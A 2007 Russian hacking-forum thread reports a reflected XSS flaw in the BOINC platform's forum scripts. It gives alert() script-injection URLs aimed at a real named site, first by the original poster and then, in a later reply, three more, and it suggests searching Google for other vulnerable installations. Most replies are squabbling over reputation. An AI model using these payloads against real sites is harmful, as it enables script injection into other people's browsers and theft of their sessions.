Xss в Bonic(популярный двиг)

Discussion in 'Уязвимости' started by BlackCats, 25 Mar 2007.

Thread Status:
Not open for further replies.
  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    итак, моя первая уязвимость в действительно популярном скрите.

    итак, на этот раз это XSS присутствует в
    Berkeley Open Infrastructure for Network Computing - версию определить неудалось, предполагается что во всех ныне используемых.

    http://boinc.berkeley.edu/ - сайт разработчика

    Уязвимость позволяет удаленному пользователю произвести XSS нападение.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре 'id' в сценарии forum_forum.php.Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы.

    пример:

    Code:
    http://www.malariacontrol.net/forum_forum.php?id=3"><script>alert(99)</script>
    т.е. мы подставляем сразу после id=**свой скрипт и всё

    также вы сами можете найти мноджество сайтов с такой уязвимостью вбив в гугле BONIC
     
    #1 BlackCats, 25 Mar 2007
    Last edited: 25 Mar 2007
    4 people like this.
  2. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    Уязвимость существует из-за недостаточной обработки [b]данных в адресной строке[/b].
    no comments....
     
  3. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    :))) ну а как надо было?
     
  4. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    Code:
    Уязвимость существует из-за недостаточной обработки входных данных в параметре 'id' в сценарии forum_forum.php
    например
     
  5. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    спасибо :) обновил.
     
  6. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    дык она же не активная даже =/
     
  7. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    ну какая есть :) была бы активная думаю в паблик бы не выкладывал.
     
  8. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    \6/, сразу видно - ты хакер. такие крутые Xss находишь! Что просто вах!

    только вопрос - кому они такие нужны.. ? жаль что ты вряд ли на этот вопрос ответишь.
     
  9. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    хм, как тебе ответить, сразу видно что это типа наезд :)
    знаеш.. я тебе так отвечу:
    я постю эти ххс для того, чтобы:
    1-если возникнет вопрос "а какие есть баги в этом движке, ато на секлабе ничего не нашёл" могли зайти в эти темы
    2-для того чтобы люди видели что я активе, и в следующий раз я не получил отказа в принятии в МОА.
     
  10. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    Чего только человек не сделает, что отдать свою жизнь кому-то.. или скорее чему-то.. Натянутые на ж0 старания...
     
  11. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    непонял.. понял тока то что ты сказал что-тто плохое :(
     
    1 person likes this.
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Он сказал что ты из жопы лезешь чтобы тебя взяли в МОА )
     
  13. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    а он что-то имеет против? :)
     
    1 person likes this.
  14. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    О да, такую сложнейшую и запутаную xss ооочень сложно найти.



    p.s.лови еще одну
    Code:
    http://www.malariacontrol.net/forum_thread.php?id=425"><script>alert(/heek!/)</script>
    И еще.
    В поле email.
    Code:
    http://www.malariacontrol.net/login_action.php
    И еще одну

    Code:
    http://www.malariacontrol.net/forum_subscribe.php?action=subscribe&thread=425"><script>alert()</script>
    Нашел 1 паршивую xss и уже выпрыгиваеш из штанов.
     
    #14 Ksander, 26 Mar 2007
    Last edited: 26 Mar 2007
    1 person likes this.
  15. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    я непонимаю, какого вы все наезжаете?????? ненравица - пройдите мимо!
     
  16. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Если чтото делаеш, то делай до конца, и без этого пафоса - Йа ЙА ЙА!!!
     
    1 person likes this.
  17. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    а что я дедаю? я нашёл уязвимость, выложил, не для того чтобы показать какой я мега хакенр, а для того чтобы другие знаю что она там есть. что-то ненравица - МИМО!
     
  18. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Икокого вы здесь оффтоп развели, хекеры =(
    Ksander и \6/ - один хрен вы кидисы =)
    Погоня за репой хххмм. Смешно.
    Сори... Не сдержался =\
     
    2 people like this.
  19. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Еще это забыл
    Помойму это опровергает твои же слова

    1M}{0
     
    1 person likes this.
  20. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    ты путаеш понятия "активный на форуме человек" и "мега хакер"

    PS
    всё, игнор больше небуду тебе отвечать.
     
Thread Status:
Not open for further replies.